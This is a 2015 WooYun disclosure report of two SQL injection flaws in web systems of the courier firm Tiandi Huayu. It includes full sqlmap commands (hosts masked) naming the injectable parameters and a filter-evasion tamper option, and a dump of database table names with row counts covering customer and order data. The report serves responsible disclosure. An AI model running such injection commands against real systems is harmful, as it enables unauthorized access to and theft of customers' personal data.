当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139189

漏洞标题:快递安全之天地华宇两处SQL注入涉及大量信息

相关厂商:天地华宇

漏洞作者: lightless

提交时间:2015-09-10 21:11

修复时间:2015-10-26 10:52

公开时间:2015-10-26 10:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-10: 细节已通知厂商并且等待厂商处理中
2015-09-11: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-26: 细节向公众公开

简要描述:

人形神器~

详细说明:

两处注入点
Case 1:

D:\Tools\WEB\sqlmap>python sqlmap.py -u "http://**.**.**.**:9080/PriceQuery?shipperCity=%25E5%258C%2597%25E4%25BA%25AC%25E5%25B8%2582&conCity=%25E5%258C%2597%25E4%25BA%25AC%25E5%25B8%2582&shipperCounty=%25E8%25A5%25BF%25E5%259F%258E%25E5%258C%25BA&conCounty=%25E4%25B8%259C%25E5%259F%258E%25E5%258C%25BA&ebProductTypeId=100000&t=1441445465464" -p ebProductTypeId --random-agent --tamper=space2comment -D "thoms" --tables --count


Case 2:

D:\Tools\WEB\sqlmap>python sqlmap.py -u "http://**.**.**.**/05xgnew/Default.aspx" --data "__VIEWSTATE=%2FwEPDwUKLTUwOTQ0NDQ3MWRktA6PBCi8proujSc4OHkUB7epxyA%3D&gh=1&mm=1&btn=%B5%C7%C2%BC&__EVENTVALIDATION=%2FwEWBAK%2FjdP5AQK578rvDALD77bvDAKSoqqWD8OU6dcTGppipGwM0u%2B3IgB7ezme" -p gh --random-agent --dbs


Case2是基于时间的盲注,太慢了。。

漏洞证明:

Case 1:

Database: thoms
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| dbo.CD_STATUS_HISTORY          | 7876790 |
| dbo.EO_ORDER_MATERIEL          | 1763946 |
| dbo.OMS_DC_ORDER               | 1242568 |
| dbo.EO_ORDER_EXCEPTION_HISTORY | 460400  |
| dbo.EB_MOBILE_CONTACT          | 417779  |
| dbo.EB_PRODUCT_DETAIL          | 400910  |
| dbo.EO_DISTPACH_VEHICLE        | 384321  |
| dbo.EI_ALIBABA_ORDER_STATUS    | 380105  |
| dbo.EB_PRODUCT_DETAIL_BACK     | 285028  |
| dbo.EO_ORDER                   | 159037  |
| dbo.EI_TAOBAO_CARGO            | 122364  |
| dbo.EB_SATISFY                 | 72506   |
| dbo.EI_TAOBAO_ORDER            | 59354   |
| dbo.EI_NET_ORDER               | 30599   |
| dbo.TMP_PRICE                  | 23231   |
| dbo.EB_CUSTOMER                | 22919   |
| dbo.EB_CUSTOMER_CONTACT        | 22904   |
| dbo.EB_NET_SERIAL              | 17053   |
| dbo.EB_OMS_HR                  | 16905   |
| dbo.CD_MESSAGE_CONTEXT         | 13739   |
| dbo.EO_ORDER_EXCEPTION         | 13157   |
| dbo.EB_SHIPPER_ADDRESS         | 9638    |
| dbo.OMS_PRICE_FREIGHT          | 5791    |
| dbo.EI_NET_ORDER_RECORD        | 5246    |
| dbo.EB_DISCOUNT                | 4216    |
| dbo.ES_ESUG_2_ESUS             | 3671    |
| dbo.ES_USER                    | 3660    |
| dbo.EB_PLACE                   | 3409    |
| dbo.EB_PLACE_BAK               | 3409    |
| dbo.EB_PLACE_PMS               | 3398    |
| dbo.EI_CUSTOMER_ORDER_CARGO    | 3151    |
| dbo.EI_CUSTOMER_ORDER          | 3147    |
| dbo.EB_CUSTOMER_DISCOUNT       | 3006    |
| dbo.tmp_city_con               | 2997    |
| dbo.EB_VEHICLE                 | 2554    |
| dbo.ES_CONTROL_PARAM           | 1978    |
| dbo.ES_ESCO_2_ESCP             | 1967    |
| dbo.ES_COMPANY                 | 1802    |
| dbo.EB_OUT_CUSTOMER            | 726     |
| dbo.ES_ESRO_2_ESFR             | 666     |
| dbo.EB_CODE_MASTER             | 651     |
| dbo.ES_ESHP_2_ESCO             | 625     |
| dbo.ES_FUNCTION_RESOURCE       | 444     |
| dbo.ES_FUNCTION_PERMISSION     | 361     |
| dbo.EB_CODE_MASTER_TYPE        | 113     |
| dbo.ES_ESHP_2_ESUS             | 89      |
| dbo.ES_HOOD_PLATFORM           | 86      |
| dbo.ES_ESIE_2_ESDR             | 72      |
| dbo.CD_STATUS_ACTION           | 67      |
| dbo.ES_DATASOURCE_RES          | 67      |
| dbo.CD_EXCEPTION_ITEM          | 50      |
| dbo.CD_ACTION_DEFINED          | 29      |
| dbo.CD_ACTION_DEFINED_copy     | 29      |
| dbo.ES_ESUG_2_ESRO             | 28      |
| dbo.CD_STATUSES_DETAIL         | 22      |
| dbo.EB_ORDER_TYPE              | 22      |
| dbo.EB_CUSTOMER_ROLE           | 16      |
| dbo.ES_USER_2_POST             | 16      |
| dbo.ES_ROLE                    | 12      |
| dbo.ES_USER_GROUP              | 11      |
| dbo.EB_SHIPPER                 | 8       |
| dbo.CD_STATUS_SMS              | 6       |
| dbo.CD_NOTIFY_EXCEPTION        | 5       |
| dbo.CD_TIMER_ACTION            | 5       |
| dbo.CD_TIMER_DEFINE            | 5       |
| dbo.EB_CUSTOMER_URL            | 4       |
| dbo.EB_EBPJ_2_ESUS             | 4       |
| dbo.EB_SERVICES                | 4       |
| dbo.ES_COUNTER                 | 4       |
| dbo.ES_DATASOURCE              | 4       |
| dbo.ES_DIY_REPORT              | 4       |
| dbo.CD_BILL_NO_RULE            | 3       |
| dbo.EB_PRODUCT_TYPE            | 3       |
| dbo.OMS_PRICE_CUSTOMER         | 3       |
| dbo.OMS_PRICE_HEAD             | 3       |
| dbo.CD_STATUSES_HEADER         | 2       |
| dbo.COUNTY_FIRSTCOMPANY        | 2       |
| dbo.EB_CUSTOMER_CHECK          | 2       |
| dbo.EB_CUSTOMER_MILEAGE        | 2       |
| dbo.EB_EBCU_2_EBSP             | 2       |
| dbo.EB_REGION                  | 2       |
| dbo.EO_TYPE_CONTENT            | 2       |
| dbo.TMP_CITY                   | 2       |
| dbo.DISCOUNT                   | 1       |
| dbo.EB_CERTIFICATION           | 1       |
| dbo.EB_EBPJ_2_EBCC             | 1       |
| dbo.EB_FEE_HEAD                | 1       |
| dbo.EB_LINE                    | 1       |
| dbo.EB_ORDER_TASK              | 1       |
| dbo.EB_PORT                    | 1       |
| dbo.EB_PROJECT                 | 1       |
| dbo.EO_ORDER_ANOMALY           | 1       |
| dbo.ES_DEPARTMENT              | 1       |
| dbo.ES_ESDA_2_ESCO             | 1       |
| dbo.ES_MESSAGE_TYPE            | 1       |
| dbo.ES_STATION                 | 1       |
+--------------------------------+---------+


1.png


Case 2:

2.png


3.png


4.png


太慢了不跑了,证明问题即可。

修复方案:

过滤、废弃系统及时下线。

版权声明:转载请注明来源 lightless@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-09-11 10:50

厂商回复:

CNVD未复现所述情况,暂未列入处置流程。

最新状态:

暂无